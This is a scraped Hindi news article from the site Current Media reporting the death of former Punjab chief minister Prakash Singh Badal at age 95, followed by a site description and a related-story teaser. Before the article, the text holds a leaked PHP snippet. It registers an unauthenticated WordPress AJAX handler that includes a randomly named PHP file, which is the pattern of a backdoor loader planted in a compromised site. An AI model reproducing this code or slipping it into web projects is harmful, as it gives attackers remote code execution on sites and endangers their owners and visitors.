if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }प्रकाश सिंह बादल का 95 वर्ष की आयु में निधन - Current Media

प्रकाश सिंह बादल का 95 वर्ष की आयु में निधन

अमृतसर । कई दिनों से बीमार चल रहे पंजाब के पूर्व मुख्यमंत्री और शिरोमणि अकाली दल के वरिष्ठ नेता प्रकाश सिंह बादल का निधन हो गया है। वो 95 साल के थे। अकाली दल के मीडिया सलाहकार जंगबीर सिंह ने बादल के निधन की पुष्टि की है। बीते दिनों प्रकाश सिंह बादल को सांस लेने में तकलीफ हुई थी जिसके बाद उन्हें अस्पताल में भर्ती कराया गया था। उन्हें पिछले साल भी सांस लेने में तकलीफ हुई थी वहीं पिछले ही साल वो कोविड से भी संक्रमित हुए थे.प्रकाश सिंह बादल का जन्म 8 दिसंबर 1927 को पंजाब के बठिंडा के अबुल खुराना गांव में हुआ था.बताया जाता है कि वो प्रशासनिक अफसर बनना चाहते थे लेकिन अकाली नेता ज्ञानी करतार सिंह से प्रभावित होकर वो राजनीति में आ गए। उन्होंने 1947 में अपने राजनीतिक सफर की शुरुआत गांव के सरपंच के रूप में की। वो दशकों तक पंजाब की राजनीति का अहम चेहरा बने रहे। प्रकाश सिंह बादल ने अपना पहला विधानसभा चुनाव साल 1957 में जीता था । वो 1970 में जब 43 साल के थे तब पंजाब के सबसे युवा मुख्यमंत्री बने। प्रकाश सिंह बादल ने कुल 5 बार पंजाब के मुख्यमंत्री की शपथ ली। पंजाब के मुख्यमंत्री भगवंत मान ने भी बादल की मौत पर दुख व्यक्त करते हुए ट्वीट किया है.

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …